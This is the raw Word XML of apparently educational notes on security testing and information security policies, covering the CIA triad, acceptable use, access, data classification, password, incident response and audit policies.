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DE0234E" w:rsidP="449E37A7" w:rsidRDefault="0DE0234E" w14:paraId="1D3691AA" w14:textId="235452F6">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="24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auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="449E37A7" w:rsidR="7B32FF1E">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="7B32FF1E">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>What is</w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="7B32FF1E">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="7B32FF1E">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Security Testing</w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="7B32FF1E">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0DE0234E" w:rsidP="449E37A7" w:rsidRDefault="0DE0234E" w14:paraId="576161B3" w14:textId="2C4C68D4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="24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US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="449E37A7" w:rsidR="7B32FF1E">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>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
        </w:rPr>
        <w:t xml:space="preserve">It </w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="7B32FF1E">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>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
        </w:rPr>
        <w:t>is a type of Software Testing that uncovers vulnerabilities, threats, risks in a software application and prevents malicious attacks from intruders. </w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="7B32FF1E">
        <w:rPr>
          <w:rStyle w:val="eop"/>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IN"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0DE0234E" w:rsidP="449E37A7" w:rsidRDefault="0DE0234E" w14:paraId="35E537F8" w14:textId="270B057E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="24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US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="449E37A7" w:rsidR="7B32FF1E">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>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
        </w:rPr>
        <w:t>The purpose of Security Tests is to identify all possible loopholes and weaknesses of the software system which might result in a loss of information, revenue, and reputation at the hands of the employees or outsiders of the Organization.</w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="7B32FF1E">
        <w:rPr>
          <w:rStyle w:val="eop"/>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IN"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0DE0234E" w:rsidP="449E37A7" w:rsidRDefault="0DE0234E" w14:paraId="53A60AFB" w14:textId="7CAF8EAA">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="48"/>
        <w:jc w:val="both"/>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p>
    <w:p w:rsidR="0DE0234E" w:rsidP="449E37A7" w:rsidRDefault="0DE0234E" w14:paraId="6A679665" w14:textId="7AC7E7AF">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="24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auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="449E37A7" w:rsidR="7B32FF1E">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="7B32FF1E">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Why is Security Testing Important?</w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="7B32FF1E">
        <w:rPr>
          <w:rStyle w:val="eop"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0DE0234E" w:rsidP="449E37A7" w:rsidRDefault="0DE0234E" w14:paraId="767991F3" w14:textId="76AD316F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="24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US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="449E37A7" w:rsidR="7B32FF1E">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>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
        </w:rPr>
        <w:t xml:space="preserve">The main goal of </w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="7B32FF1E">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Security Testing</w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="7B32FF1E">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>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
        </w:rPr>
        <w:t xml:space="preserve"> is to identify the threats in the system and measure its potential vulnerabilities, so the threats can be encountered, and the system does not stop functioning or cannot be exploited. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0DE0234E" w:rsidP="449E37A7" w:rsidRDefault="0DE0234E" w14:paraId="00B5ED9E" w14:textId="4BBEF714">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="24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US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="449E37A7" w:rsidR="7B32FF1E">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>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
        </w:rPr>
        <w:t>It also helps in detecting all possible security risks in the system and helps developers to fix the problems through coding.</w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="7B32FF1E">
        <w:rPr>
          <w:rStyle w:val="eop"/>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IN"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0DE0234E" w:rsidP="449E37A7" w:rsidRDefault="0DE0234E" w14:paraId="3E076205" w14:textId="1A2015C0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>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US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="449E37A7" w:rsidR="7B32FF1E">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>security goals such as confidentiality, integrity, and availability, together known as the CIA triad, along with security risks controlling and monitoring activities and concepts such as assets, threats, and vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0DE0234E" w:rsidP="764D761D" w:rsidRDefault="0DE0234E" w14:paraId="6F0F5342" w14:textId="48CE4AC4">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="449E37A7" wp14:paraId="3B303BF2" wp14:textId="50793003">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="449E37A7" w:rsidR="4CB29722">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Information Security Policies and Procedures</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="449E37A7" wp14:paraId="2CD99B69" wp14:textId="7934BCEE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="449E37A7" w:rsidR="7B5E20E6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="005DB3DC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Understanding Security Policies and Procedures:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="764D761D" wp14:paraId="5BACB445" wp14:textId="4F8F7F49">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78A7EB49">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security policies to vary among organizations based on the business model,</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="764D761D" wp14:paraId="6ED7FFDB" wp14:textId="3AE85C49">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78A7EB49">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The basis of all security policies should be a security risk assessment that examines specific security threats and how they </w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="78A7EB49">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impact</w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="78A7EB49">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the organization.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="764D761D" wp14:paraId="4496214E" wp14:textId="73A8ED64">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6A33F5E4">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Acceptable Use:</w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="2C2739A1">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This policy defines practices that a user of a computer system must adhere to be compliant with the organization’s security policies and procedures. This policy covers both acceptable and non-acceptable </w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="226C5236">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behaviour</w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="2C2739A1">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in using digital resources, such as networks, </w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="10295BD7">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websites,</w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="2C2739A1">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and data.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="764D761D" wp14:paraId="613F8612" wp14:textId="7917E4C4">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36CF295C">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 xml:space="preserve">Minimum Access: </w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="36CF295C">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This policy defines the minimum levels of access needed to perform certain tasks. The goal of this policy is to prevent people from being granted access rights </w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="36CF295C">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in excess of</w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="36CF295C">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what is needed to perform their tasks.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="764D761D" wp14:paraId="7B128C5A" wp14:textId="2BA87D8F">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36CF295C">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 xml:space="preserve">Network Access: </w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="36CF295C">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this policy can define what is permissible and non-permissible while on the network (LANs).</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="764D761D" wp14:paraId="0CB3D26F" wp14:textId="06DD907C">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782A442A">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 xml:space="preserve">Remote Access: </w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="782A442A">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This policy requires what is needed so that remote network access can be granted to both internal employees and external (non-employee) users. VPN usage is often covered in this policy.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="764D761D" wp14:paraId="732FC9F7" wp14:textId="475B9912">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782A442A">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Internet Access:</w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="39FD139C">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 This policy defines permissible usage of the Internet by employees and guests of an organization. The scope of this policy includes the types of websites that may and may not be accessed,</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="764D761D" wp14:paraId="7A072BE5" wp14:textId="7554CDB9">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39FD139C">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User Account Management:</w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="39FD139C">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This policy defines the creation, maintenance, and deletion of user accounts. Regular auditing of user accounts is also covered in this policy</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="764D761D" wp14:paraId="6C4CA4AB" wp14:textId="33921DB9">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36D0E4F7">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Data Classification:</w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="36D0E4F7">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A data classification policy defines the </w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="36D0E4F7">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different types</w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="36D0E4F7">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of data that are considered sensitive and must be secured.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="764D761D" wp14:paraId="641DDFD9" wp14:textId="358249FE">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2806D921">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data classification structure</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="54FD612E">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Public</w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="62FB5D8B">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(anyone</w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="37060964">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Confidential (</w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="3A7899A7">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email, reports)</w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="54FD612E">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Highly </w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="36044C6B">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Confidential (trade secrets, strategic plans, product designs and </w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="514D0067">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non-public</w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="36044C6B">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financial data)</w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="54FD612E">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Private</w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="4DA3CFFE">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(customer information)</w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="54FD612E">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and Secret</w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="48858E7D">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(design Documents)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="764D761D" wp14:paraId="44AB5B24" wp14:textId="23968D4D">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12A81B36">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Server Security:</w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="5929510D">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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="5929510D">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This policy conveys responsibility to the server owner(s) to follow corporate security practices, as well as industry best practices for installing, </w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="5929510D">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configuring</w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="5929510D">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and </w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="5929510D">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operating</w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="5929510D">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servers and systems.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="764D761D" wp14:paraId="154D1E82" wp14:textId="482F7105">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27DC97E5">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Guest Access:</w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="6F9E4917">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policy is to require guests to read and agree with acceptable use policies before granting network access to them</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="1C94D125">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this policy is to enforce the organization's security standards and still </w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="1C94D125">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provide</w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="1C94D125">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procedures for allowing guests to access the network or Internet</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="764D761D" wp14:paraId="4AB9E393" wp14:textId="3CAC6EBA">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1C94D125">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 xml:space="preserve">Physical Security: </w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="1C94D125">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power loss, theft, fire, and natural disasters</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="764D761D" wp14:paraId="28E96F02" wp14:textId="6DD2BD93">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2A92CD82">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Password Policy:</w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="2A92CD82">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This policy can apply to applications, user accounts and any other places where passwords are needed.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="764D761D" wp14:paraId="0992B970" wp14:textId="7F33FE10">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2A92CD82">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Malware Protection:</w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="14E01800">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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="14E01800">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="14E0180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IN"/>
        </w:rPr>
        <w:t>nauthorize</w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="14E0180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IN"/>
        </w:rPr>
        <w:t>d access to a computer system.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="764D761D" wp14:paraId="7CD8C1B2" wp14:textId="63B69AB2">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68EAC3D8">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Incident Response:</w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="7DF6365A">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This policy describes how to respond to a security-related incident. These incidents can range from the discovery of malware and violations of the acceptable use policy to the unauthorized access of sensitive data.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="764D761D" wp14:paraId="2E46BC7F" wp14:textId="274C1F8E">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7DF6365A">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Audit Policy:</w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="7DF6365A">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 This policy authorizes auditors to request access to systems for the purpose of conducting an </w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="7DF6365A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>audit</w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="7DF6365A">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The audit team might need access to log data, network traffic records and other forensic data</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="764D761D" wp14:paraId="66A8C7A6" wp14:textId="1FD57FD2">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7DF6365A">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Software Licensing:</w:t>
      </w:r>
      <w:r w:rsidRPr="764D761D" w:rsidR="7DF6365A">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 This policy addresses how the organization obtains and licenses the software it uses. </w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="764D761D" wp14:paraId="0D5E3A7E" wp14:textId="7E88E90D">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0713025C">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Electronic Monitoring and Privacy:</w:t>
      </w:r>
